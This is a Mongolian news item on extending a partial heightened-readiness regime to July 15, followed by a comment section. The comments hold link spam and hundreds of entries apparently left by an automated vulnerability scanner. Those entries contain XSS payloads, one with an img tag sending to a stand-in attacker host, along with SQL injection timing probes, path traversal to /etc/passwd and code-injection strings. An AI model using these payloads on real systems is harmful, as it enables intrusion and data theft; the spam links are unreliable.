Өндөржүүлсэн бэлэн байдлыг 7 дугаар сарын 15-н хүртэл сунгалаа

Н.Алтанцэцэг / Улстөр

Засгийн газрын ХМОНХХ-ийн дарга Ц.Ганзориг Улсын онцгой комиссын шийдвэрийн талаар мэдээлэл хийлээ. Тэрбээр "Өнөөдөр Улсын онцгой комисс болон Засгийн газар хуралдаж, өндөржүүлсэн бэлэн байдлын хэсэгчилсэн зэргийг долдугаар сарын 15-н хүртэл сунгах шийдвэр гаргалаа.

Хязгаарлалтад орсон үйлчилгээний байгуулагуудыг шат дараатай нээхийг аймаг, нийслэлийн удирдлагуудад үүрэг болголоо. Үүний дагуу нийслэлийн Онцгой комисс одоо хуралдаж, холбогдох шийдвэрүүдийг гаргана.

Дотооддоо халдвар тархаахгүйн тулд урьдчилан сэргийлэх, анхаарал сэрэмжээ алдагдуулахгүйгээр хилийн чанадад байгаа иргэдээ татсаар байх болно. Зургаадугаар сард 2,000 гаруй иргэнээ татсан бол долдугаар сард 3,000 иргэнээ татахаар төлөвлөж байна" гэв.


Сэтгэгдэл

wecomtjpq [116.0.1.138] 2021-02-03 01:39:17

Мэдээ.МН [url=http://www.gwkv5502tnc0yi93h00q6207d4rj6wj9s.org/]uwecomtjpq[/url] wecomtjpq http://www.gwkv5502tnc0yi93h00q6207d4rj6wj9s.org/ <a href="http://www.gwkv5502tnc0yi93h00q6207d4rj6wj9s.org/">awecomtjpq</a>

xszwknmbej [116.0.1.138] 2021-01-16 05:22:20

Мэдээ.МН [url=http://www.gl256z796i4zhg2oy013p8if20am37oms.org/]uxszwknmbej[/url] xszwknmbej http://www.gl256z796i4zhg2oy013p8if20am37oms.org/ <a href="http://www.gl256z796i4zhg2oy013p8if20am37oms.org/">axszwknmbej</a>

ohjroxwpq [116.0.1.138] 2021-01-06 08:45:22

Мэдээ.МН ohjroxwpq http://www.g0gt6s14pd14q8868f4kqg1b74c74nmls.org/ <a href="http://www.g0gt6s14pd14q8868f4kqg1b74c74nmls.org/">aohjroxwpq</a> [url=http://www.g0gt6s14pd14q8868f4kqg1b74c74nmls.org/]uohjroxwpq[/url]

hqjyiezrzo [116.0.1.138] 2020-12-30 07:46:26

Мэдээ.МН hqjyiezrzo http://www.g96t0615k508rqj7nqywo2unk6841f6xs.org/ <a href="http://www.g96t0615k508rqj7nqywo2unk6841f6xs.org/">ahqjyiezrzo</a> [url=http://www.g96t0615k508rqj7nqywo2unk6841f6xs.org/]uhqjyiezrzo[/url]

gvjwwfiqxb [124.89.227.200] 2020-12-03 22:26:32

Мэдээ.МН gvjwwfiqxb http://www.g58ck33m6jwhp64p145d70n7lk8dwq35s.org/ <a href="http://www.g58ck33m6jwhp64p145d70n7lk8dwq35s.org/">agvjwwfiqxb</a> [url=http://www.g58ck33m6jwhp64p145d70n7lk8dwq35s.org/]ugvjwwfiqxb[/url]

kiphlwrrf [221.202.168.254] 2020-12-03 12:51:19

Мэдээ.МН <a href="http://www.g4ca8sd1088a23i0k5d539jwsf5m6n3xs.org/">akiphlwrrf</a> kiphlwrrf http://www.g4ca8sd1088a23i0k5d539jwsf5m6n3xs.org/ [url=http://www.g4ca8sd1088a23i0k5d539jwsf5m6n3xs.org/]ukiphlwrrf[/url]

fkfzmxycfx [223.244.251.50] 2020-12-03 11:12:09

Мэдээ.МН <a href="http://www.gou19d79v7ql01y89eclc94v57p980zvs.org/">afkfzmxycfx</a> [url=http://www.gou19d79v7ql01y89eclc94v57p980zvs.org/]ufkfzmxycfx[/url] fkfzmxycfx http://www.gou19d79v7ql01y89eclc94v57p980zvs.org/

cxqkpcbme [222.91.181.27] 2020-12-02 08:15:03

Мэдээ.МН <a href="http://www.g2ul0uo705y04639521l9afqe0hjz7cts.org/">acxqkpcbme</a> [url=http://www.g2ul0uo705y04639521l9afqe0hjz7cts.org/]ucxqkpcbme[/url] cxqkpcbme http://www.g2ul0uo705y04639521l9afqe0hjz7cts.org/

dwqdpllydt [36.44.36.188] 2020-11-28 04:01:56

Мэдээ.МН <a href="http://www.g8l63l4je864bf9x2d4817oba7ou44zss.org/">adwqdpllydt</a> dwqdpllydt http://www.g8l63l4je864bf9x2d4817oba7ou44zss.org/ [url=http://www.g8l63l4je864bf9x2d4817oba7ou44zss.org/]udwqdpllydt[/url]

vymsxdcwkt [218.59.233.34] 2020-11-26 16:10:14

Мэдээ.МН <a href="http://www.g57l7d5z015qguj5ec006j5vuf6hp560s.org/">avymsxdcwkt</a> [url=http://www.g57l7d5z015qguj5ec006j5vuf6hp560s.org/]uvymsxdcwkt[/url] vymsxdcwkt http://www.g57l7d5z015qguj5ec006j5vuf6hp560s.org/

ipqthkomve [113.72.120.104] 2020-11-23 08:06:37

Мэдээ.МН [url=http://www.gmpxx9o14o7qd599b0576cn219l1dwr1s.org/]uipqthkomve[/url] ipqthkomve http://www.gmpxx9o14o7qd599b0576cn219l1dwr1s.org/ <a href="http://www.gmpxx9o14o7qd599b0576cn219l1dwr1s.org/">aipqthkomve</a>

vyrksoyjkw [115.60.91.156] 2020-11-22 06:05:31

Мэдээ.МН [url=http://www.gpt37z28n2r88f24p2hwp660p854mzfks.org/]uvyrksoyjkw[/url] vyrksoyjkw http://www.gpt37z28n2r88f24p2hwp660p854mzfks.org/ <a href="http://www.gpt37z28n2r88f24p2hwp660p854mzfks.org/">avyrksoyjkw</a>

qkskqsngk [36.90.43.8] 2020-11-21 07:05:41

Мэдээ.МН qkskqsngk http://www.g28s4skcbb603h4s03days9ga337352ks.org/ <a href="http://www.g28s4skcbb603h4s03days9ga337352ks.org/">aqkskqsngk</a> [url=http://www.g28s4skcbb603h4s03days9ga337352ks.org/]uqkskqsngk[/url]

dzgglgiwzd [111.61.177.158] 2020-11-20 14:14:12

Мэдээ.МН dzgglgiwzd http://www.grg9k6940t2unw37168f9fdmj75dd10ps.org/ [url=http://www.grg9k6940t2unw37168f9fdmj75dd10ps.org/]udzgglgiwzd[/url] <a href="http://www.grg9k6940t2unw37168f9fdmj75dd10ps.org/">adzgglgiwzd</a>

ivzbmkpyrp [60.219.133.38] 2020-11-12 08:26:38

Мэдээ.МН <a href="http://www.g44e513rxi3ii9253w1i79imh17t7phxs.org/">aivzbmkpyrp</a> [url=http://www.g44e513rxi3ii9253w1i79imh17t7phxs.org/]uivzbmkpyrp[/url] ivzbmkpyrp http://www.g44e513rxi3ii9253w1i79imh17t7phxs.org/

sbhtbxnbkw [218.72.213.103] 2020-11-10 23:28:42

Мэдээ.МН <a href="http://www.g86b9eo166qd4nn414a8io517dn9ed7ts.org/">asbhtbxnbkw</a> [url=http://www.g86b9eo166qd4nn414a8io517dn9ed7ts.org/]usbhtbxnbkw[/url] sbhtbxnbkw http://www.g86b9eo166qd4nn414a8io517dn9ed7ts.org/

sgdryfy [222.139.177.208] 2020-11-09 11:40:55

Мэдээ.МН sgdryfy http://www.gqkg0fc822i9579f3eemu488ksu0s013s.org/ <a href="http://www.gqkg0fc822i9579f3eemu488ksu0s013s.org/">asgdryfy</a> [url=http://www.gqkg0fc822i9579f3eemu488ksu0s013s.org/]usgdryfy[/url]

wecgxjgktz [223.150.225.137] 2020-11-09 05:04:15

Мэдээ.МН <a href="http://www.g3qkze28e1qd4822yl23hbj450l0qy56s.org/">awecgxjgktz</a> [url=http://www.g3qkze28e1qd4822yl23hbj450l0qy56s.org/]uwecgxjgktz[/url] wecgxjgktz http://www.g3qkze28e1qd4822yl23hbj450l0qy56s.org/

rrweezbrn [60.219.133.38] 2020-11-07 18:05:22

Мэдээ.МН <a href="http://www.go63s51sv74458i6y6ind5129wioehb4s.org/">arrweezbrn</a> [url=http://www.go63s51sv74458i6y6ind5129wioehb4s.org/]urrweezbrn[/url] rrweezbrn http://www.go63s51sv74458i6y6ind5129wioehb4s.org/

vydhkzgv [113.72.123.115] 2020-11-07 12:49:53

Мэдээ.МН <a href="http://www.g88j03329l4ajl626yaltau45ju4e3d0s.org/">avydhkzgv</a> vydhkzgv http://www.g88j03329l4ajl626yaltau45ju4e3d0s.org/ [url=http://www.g88j03329l4ajl626yaltau45ju4e3d0s.org/]uvydhkzgv[/url]

vwfbpfmdi [121.28.95.243] 2020-11-04 18:16:59

Мэдээ.МН vwfbpfmdi http://www.g7age608dsp797op9ls341t598gtfb42s.org/ <a href="http://www.g7age608dsp797op9ls341t598gtfb42s.org/">avwfbpfmdi</a> [url=http://www.g7age608dsp797op9ls341t598gtfb42s.org/]uvwfbpfmdi[/url]

dixgcxgb [110.185.160.13] 2020-11-03 04:08:36

Мэдээ.МН [url=http://www.g2929xhmmdc0sre2jy5287q2b2y4a420s.org/]udixgcxgb[/url] dixgcxgb http://www.g2929xhmmdc0sre2jy5287q2b2y4a420s.org/ <a href="http://www.g2929xhmmdc0sre2jy5287q2b2y4a420s.org/">adixgcxgb</a>

e [116.113.93.82] 2020-10-28 22:13:33

1

e [116.113.93.82] 2020-10-28 22:13:26

1

e [116.113.93.82] 2020-10-28 22:13:20

1

e [116.113.93.82] 2020-10-28 22:13:16

1<KS4e1v<

e [116.113.93.82] 2020-10-28 22:13:11

1<img sRc='http://attacker-9070/log.php?

e [116.113.93.82] 2020-10-28 22:13:07

1<Xneh0R x=9383>

e [116.113.93.82] 2020-10-28 22:13:04

1<ifRAme sRc=9853.com></IfRamE>

e [116.113.93.82] 2020-10-28 22:13:01

1<WRRUCQ>C72MZ[!+!]</WRRUCQ>

e [116.113.93.82] 2020-10-28 22:12:57

1u3XsA <ScRiPt >bBbX(9922)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:12:54

1<% contenteditable onresize=bBbX(9628)>

e [116.113.93.82] 2020-10-28 22:12:48

1}body{acu:Expre/**/SSion(bBbX(9035))}

e [116.113.93.82] 2020-10-28 22:12:42

1<img<!-- --> src=x onerror=alert(9348);//><!-- -->

e [116.113.93.82] 2020-10-28 22:12:37

[url=http://www.vulnweb.com][/url]

e [116.113.93.82] 2020-10-28 22:12:34

<a HrEF=jaVaScRiPT:>

e [116.113.93.82] 2020-10-28 22:12:30

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82] 2020-10-28 22:12:27

1<input autofocus onfocus=bBbX(9498)>

e [116.113.93.82] 2020-10-28 22:12:22

e [116.113.93.82] 2020-10-28 22:12:18

1<ScRiPt>bBbX(9650)</sCripT>

e [116.113.93.82] 2020-10-28 22:12:15

1\u003CScRiPt\bBbX(9394)\u003C/sCripT\u003E

e [116.113.93.82] 2020-10-28 22:12:11

%31%3C%53%63%52%69%50%74%20%3E%62%42%62%58%289332%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82] 2020-10-28 22:12:07

1<img/src=">" onerror=alert(9286)>

e [116.113.93.82] 2020-10-28 22:12:02

1<img src=xyz OnErRor=bBbX(9705)>

e [116.113.93.82] 2020-10-28 22:11:57

1<img src=//testasp.vulnweb.com/t/dot.gif onload=bBbX(9569)>

e [116.113.93.82] 2020-10-28 22:11:55

1<body onload=bBbX(9906)>

e [116.113.93.82] 2020-10-28 22:11:51

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9300'>

e [116.113.93.82] 2020-10-28 22:11:48

1<isindex type=image src=1 onerror=bBbX(9415)>

e [116.113.93.82] 2020-10-28 22:11:45

1<svg

e [116.113.93.82] 2020-10-28 22:11:41

1<video><source onerror="javascript:bBbX(9075)">

e [116.113.93.82] 2020-10-28 22:11:38

1<ScRiPt >bBbX(9176)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:11:32

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9568></ScRiPt>

e [116.113.93.82] 2020-10-28 22:11:29

1<ScRiPt >bBbX(9307)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:11:26

1<ScR<ScRiPt>IpT>bBbX(9416)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 22:11:19

1<script>bBbX(9562)</script>

e [116.113.93.82] 2020-10-28 22:11:13

1<W6K83A>RSRWV[!+!]</W6K83A>

e [116.113.93.82] 2020-10-28 22:11:09

1<ScRiPt >bBbX(9644)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:11:05

{{9999517*9999340}}

e [116.113.93.82] 2020-10-28 22:11:01

acux10616

e [116.113.93.82] 2020-10-28 22:10:57

acu5694<s1﹥s2ʺs3ʹuca5694

e [116.113.93.82] 2020-10-28 22:10:54

19071168

e [116.113.93.82] 2020-10-28 22:10:52

'"()&%<acx><ScRiPt >bBbX(9105)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:10:48

1'"()&%<acx><ScRiPt >bBbX(9991)</ScRiPt>

e [116.113.93.82<wmRIF9<] 2020-10-28 22:10:39

1

e [116.113.93.82<img sRc='http://attacker-9593/log.php?] 2020-10-28 22:10:36

1

e [116.113.93.82<H0h78E x=9719>] 2020-10-28 22:10:31

1

e [116.113.93.82<ifRAme sRc=9199.com></IfRamE>] 2020-10-28 22:10:27

1

e [116.113.93.82<WCTGWB>ALUQB[!+!]</WCTGWB>] 2020-10-28 22:10:24

1

e [116.113.93.82IWNeP <ScRiPt >bBbX(9783)</ScRiPt>] 2020-10-28 22:10:20

1

e [116.113.93.82<% contenteditable onresize=bBbX(9716)>] 2020-10-28 22:10:16

1

e [116.113.93.82}body{acu:Expre/**/SSion(bBbX(9381))}] 2020-10-28 22:10:14

1

e [116.113.93.82<img<!-- --> src=x onerror=alert(9799);//><!-- -->] 2020-10-28 22:10:10

1

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 22:10:07

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 22:10:04

1

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 22:10:01

1

e [116.113.93.82] 2020-10-28 22:09:58

1

e [116.113.93.82<input autofocus onfocus=bBbX(9431)>] 2020-10-28 22:09:58

1

e [116.113.93.82] 2020-10-28 22:09:57

1

e [116.113.93.82] 2020-10-28 22:09:56

1

e [116.113.93.82] 2020-10-28 22:09:55

1

e [] 2020-10-28 22:09:55

1

e [116.113.93.82] 2020-10-28 22:09:54

1

e [116.113.93.82] 2020-10-28 22:09:53

1

e [116.113.93.82] 2020-10-28 22:09:52

1

e [116.113.93.82<ScRiPt>bBbX(9117)</sCripT>] 2020-10-28 22:09:51

1

e [116.113.93.82] 2020-10-28 22:09:49

1

e [116.113.93.82\u003CScRiPt\bBbX(9537)\u003C/sCripT\u003E] 2020-10-28 22:09:48

1

e [116.113.93.82] 2020-10-28 22:09:48

1

e [116.113.93.82] 2020-10-28 22:09:47

1

e [116.113.93.82] 2020-10-28 22:09:46

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%62%42%62%58%289843%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 22:09:45

1

e [116.113.93.82<img/src=">" onerror=alert(9809)>] 2020-10-28 22:09:43

1

e [116.113.93.82] 2020-10-28 22:09:43

1

e [116.113.93.82] 2020-10-28 22:09:42

1

e [116.113.93.82] 2020-10-28 22:09:41

1

e [116.113.93.82] 2020-10-28 22:09:41

1

e [116.113.93.82] 2020-10-28 22:09:40

1

e [116.113.93.82<img src=xyz OnErRor=bBbX(9545)>] 2020-10-28 22:09:40

1

e [116.113.93.82] 2020-10-28 22:09:40

1

e [116.113.93.82] 2020-10-28 22:09:39

1

e [116.113.93.82] 2020-10-28 22:09:39

1

e [116.113.93.82] 2020-10-28 22:09:38

1

e [116.113.93.82] 2020-10-28 22:09:38

1

e [116.113.93.82] 2020-10-28 22:09:37

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=bBbX(9702)>] 2020-10-28 22:09:37

1

e [116.113.93.82] 2020-10-28 22:09:35

1

e [116.113.93.82] 2020-10-28 22:09:35

1

e [116.113.93.82] 2020-10-28 22:09:35

1

e [116.113.93.82] 2020-10-28 22:09:34

1

e [116.113.93.82] 2020-10-28 22:09:34

1

e [116.113.93.82<body onload=bBbX(9517)>] 2020-10-28 22:09:34

1

e [116.113.93.82] 2020-10-28 22:09:33

1

e [116.113.93.82] 2020-10-28 22:09:33

1

e [116.113.93.82] 2020-10-28 22:09:32

1

e [116.113.93.82] 2020-10-28 22:09:32

1

e [116.113.93.82] 2020-10-28 22:09:31

1

e [116.113.93.82] 2020-10-28 22:09:31

1

e [116.113.93.82] 2020-10-28 22:09:30

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9660'>] 2020-10-28 22:09:30

1

e [116.113.93.82] 2020-10-28 22:09:29

1

e [116.113.93.82] 2020-10-28 22:09:29

1

e [116.113.93.82] 2020-10-28 22:09:27

1

e [116.113.93.82] 2020-10-28 22:09:26

1

e [116.113.93.82<isindex type=image src=1 onerror=bBbX(9354)>] 2020-10-28 22:09:25

1

e [116.113.93.82] 2020-10-28 22:09:25

1

e [116.113.93.82] 2020-10-28 22:09:24

1

e [116.113.93.82] 2020-10-28 22:09:23

1

e [116.113.93.82<svg ] 2020-10-28 22:09:23

1

e [116.113.93.82] 2020-10-28 22:09:22

1

e [116.113.93.82<video><source onerror="javascript:bBbX(9207)">] 2020-10-28 22:09:03

1

e [116.113.93.82] 2020-10-28 22:09:02

1

e [116.113.93.82] 2020-10-28 22:09:01

1

e [116.113.93.82] 2020-10-28 22:09:01

WEB-INF\web.xml

e [116.113.93.82] 2020-10-28 22:09:00

iovREAOW'));select pg_sleep(9); --

e [116.113.93.82<ScRiPt >bBbX(9083)</ScRiPt>] 2020-10-28 22:09:00

1

e [116.113.93.82] 2020-10-28 22:09:00

WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:08:58

6PsyNkd8');select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:08:58

/WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:08:57

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 22:08:57

hw97Cqjw';select pg_sleep(9); --

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9990></ScRiPt>] 2020-10-28 22:08:56

1

e [116.113.93.82] 2020-10-28 22:08:56

-1));select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 22:08:56

1

e [116.113.93.82] 2020-10-28 22:08:56

file:///etc/passwd

e [116.113.93.82] 2020-10-28 22:08:55

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 22:08:55

1

e [116.113.93.82] 2020-10-28 22:08:55

-1);select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 22:08:54

..

e [116.113.93.82] 2020-10-28 22:08:54

1

e [116.113.93.82] 2020-10-28 22:08:54

-1;select pg_sleep(3); --

e [116.113.93.82<ScRiPt >bBbX(9955)</ScRiPt>] 2020-10-28 22:08:54

1

e [116.113.93.82] 2020-10-28 22:08:53

1

e [116.113.93.82] 2020-10-28 22:08:53

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82] 2020-10-28 22:08:53

MYyccFMu'; waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 22:08:52

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82] 2020-10-28 22:08:51

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82<ScR<ScRiPt>IpT>bBbX(9176)</sCr<ScRiPt>IpT>] 2020-10-28 22:08:51

1

e [116.113.93.82] 2020-10-28 22:08:51

1

e [116.113.93.82] 2020-10-28 22:08:50

%2fetc%2fpasswd

e [116.113.93.82] 2020-10-28 22:08:50

Ft0BNLQP'; waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 22:08:49

/etc/passwd

e [116.113.93.82] 2020-10-28 22:08:48

1 waitfor delay '0:0:3' --

e [116.113.93.82<script>bBbX(9232)</script>] 2020-10-28 22:08:47

1

e [116.113.93.82] 2020-10-28 22:08:47

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82] 2020-10-28 22:08:47

-1); waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 22:08:46

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 22:08:46

-1; waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 22:08:45

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82] 2020-10-28 22:08:45

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

e [116.113.93.82<WTHU1R>ZGWGV[!+!]</WTHU1R>] 2020-10-28 22:08:45

1

e [116.113.93.82] 2020-10-28 22:08:45

../../../../../../../../../../etc/passwd.jpg

e [116.113.93.82] 2020-10-28 22:08:44

0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z

e [116.113.93.82] 2020-10-28 22:08:44

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82] 2020-10-28 22:08:42

../../../../../../../../../../../../../../../proc/version

e [116.113.93.82] 2020-10-28 22:08:42

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

e [116.113.93.82<ScRiPt >bBbX(9837)</ScRiPt>] 2020-10-28 22:08:42

1

e [116.113.93.82] 2020-10-28 22:08:41

../../../../../../../../../../etc/passwd

e [116.113.93.82] 2020-10-28 22:08:41

if(now()=sysdate(),sleep(3),0)

e [116.113.93.82] 2020-10-28 22:08:41

e [116.113.93.82] 2020-10-28 22:08:40

-1" OR 2+369-369-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:08:40

e [116.113.93.82] 2020-10-28 22:08:38

JyI=

e [116.113.93.82] 2020-10-28 22:08:38

-1' OR 2+150-150-1=0+0+0+1 or 'uVApb6Y6'='

e [{{10000476*9999308}}] 2020-10-28 22:08:38

1

e [116.113.93.82] 2020-10-28 22:08:37

-1' OR 2+349-349-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:08:37

@@0egMV

e [116.113.93.82] 2020-10-28 22:08:36

1

e [116.113.93.82] 2020-10-28 22:08:36

-1 OR 2+112-112-1=0+0+0+1

e [116.113.93.82] 2020-10-28 22:08:35

1

e [116.113.93.82] 2020-10-28 22:08:35

\

e [116.113.93.82] 2020-10-28 22:08:35

-1 OR 2+522-522-1=0+0+0+1 --

e [acux8257] 2020-10-28 22:08:35

1

e [116.113.93.82] 2020-10-28 22:08:34

1

e [116.113.93.82] 2020-10-28 22:08:34

LgZoGgy0

e [116.113.93.82] 2020-10-28 22:08:34

1'"

e [116.113.93.82] 2020-10-28 22:08:33

1

e [116.113.93.82] 2020-10-28 22:08:33

1

e [116.113.93.82] 2020-10-28 22:08:32

1

e [116.113.93.82] 2020-10-28 22:08:32

1

e [acu3923<s1﹥s2ʺs3ʹuca3923] 2020-10-28 22:08:32

1

e [116.113.93.82] 2020-10-28 22:08:31

1

e [116.113.93.82] 2020-10-28 22:08:31

1

e [116.113.93.82] 2020-10-28 22:08:31

1

e [116.113.93.829975385] 2020-10-28 22:08:28

1

e [116.113.93.82] 2020-10-28 22:08:28

1

e [116.113.93.82] 2020-10-28 22:08:28

1

e [116.113.93.82] 2020-10-28 22:08:27

<!--

e [116.113.93.82] 2020-10-28 22:08:27

1

e [116.113.93.82] 2020-10-28 22:08:27

1

e [116.113.93.82] 2020-10-28 22:08:26

'"

e [116.113.93.82] 2020-10-28 22:08:26

1

e [116.113.93.82] 2020-10-28 22:08:26

1

e [116.113.93.82] 2020-10-28 22:08:26

1

e ['"()&%<acx><ScRiPt >bBbX(9528)</ScRiPt>] 2020-10-28 22:08:25

1

e [] 2020-10-28 22:08:25

1

e [116.113.93.82] 2020-10-28 22:08:25

1

e [] 2020-10-28 22:08:24

1

e [116.113.93.82] 2020-10-28 22:08:24

1

e [116.113.93.82] 2020-10-28 22:08:24

${@print(md5(acunetix_wvs_security_test))}\

e [116.113.93.82] 2020-10-28 22:08:24

/www.vulnweb.com

e [<!--] 2020-10-28 22:08:24

1

e [JyI=] 2020-10-28 22:08:24

1

e [116.113.93.82] 2020-10-28 22:08:24

1

e [116.113.93.82] 2020-10-28 22:08:23

${@print(md5(acunetix_wvs_security_test))}

e ['"] 2020-10-28 22:08:23

1

e [116.113.93.82'"()&%<acx><ScRiPt >bBbX(9986)</ScRiPt>] 2020-10-28 22:08:23

1

e [@@4mjp8] 2020-10-28 22:08:22

1

e [116.113.93.82] 2020-10-28 22:08:22

create/.

e [116.113.93.82] 2020-10-28 22:08:22

";print(md5(acunetix_wvs_security_test));$a="

e [/www.vulnweb.com] 2020-10-28 22:08:22

1

e [116.113.93.82] 2020-10-28 22:08:21

http://hitAGA5TOQklY.bxss.me/

e [116.113.93.82] 2020-10-28 22:08:21

1

e [116.113.93.82] 2020-10-28 22:08:21

1

e [116.113.93.82] 2020-10-28 22:08:21

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [1] 2020-10-28 22:08:21

1

e [116.113.93.82] 2020-10-28 22:08:21

create

e [116.113.93.82] 2020-10-28 22:08:21

';print(md5(acunetix_wvs_security_test));$a='

e [116.113.93.82] 2020-10-28 22:08:20

1

e [116.113.93.82] 2020-10-28 22:08:20

1

e [116.113.93.82] 2020-10-28 22:08:20

1

e [116.113.93.82] 2020-10-28 22:08:20

create

e [\] 2020-10-28 22:08:20

1

e [116.113.93.82] 2020-10-28 22:08:19

;print(md5(acunetix_wvs_security_test));

e [116.113.93.82] 2020-10-28 22:08:19

1

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 22:08:19

1

e [116.113.93.82] 2020-10-28 22:08:19

1

e [1'"] 2020-10-28 22:08:19

1

e [WEB-INF\web.xml] 2020-10-28 22:08:18

1

e [http://hitpXTC6vpxm5.bxss.me/] 2020-10-28 22:08:18

1

e [116.113.93.82] 2020-10-28 22:08:18

testasp.vulnweb.com

e [116.113.93.82] 2020-10-28 22:08:18

1

e [116.113.93.82] 2020-10-28 22:08:18

1

e [WEB-INF/web.xml] 2020-10-28 22:08:17

1

e [116.113.93.82] 2020-10-28 22:08:17

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [116.113.93.82] 2020-10-28 22:08:16

1

e [/WEB-INF/web.xml] 2020-10-28 22:08:16

1

e [116.113.93.82] 2020-10-28 22:08:16

Http://testasp.vulnweb.com/t/fit.txt

e [116.113.93.82] 2020-10-28 22:08:15

testasp.vulnweb.com/t/xss.html?%00

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 22:08:15

1

e [create/.] 2020-10-28 22:08:15

1

e [116.113.93.82] 2020-10-28 22:08:15

1

e [116.113.93.82] 2020-10-28 22:08:15

^(#$!@#$)(()))******

e [116.113.93.82] 2020-10-28 22:08:15

1some_inexistent_file_with_long_name.jpg

e [116.113.93.82] 2020-10-28 22:08:14

HttP://testasp.vulnweb.com/t/xss.html?%00

e [file:///etc/passwd] 2020-10-28 22:08:14

1

e [create] 2020-10-28 22:08:14

1

e [116.113.93.82] 2020-10-28 22:08:14

!(()&&!|*|*|

e [116.113.93.82] 2020-10-28 22:08:14

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 22:08:14

1

e [116.113.93.82] 2020-10-28 22:08:14

'"()

e [create] 2020-10-28 22:08:13

1

e [116.113.93.82] 2020-10-28 22:08:13

)

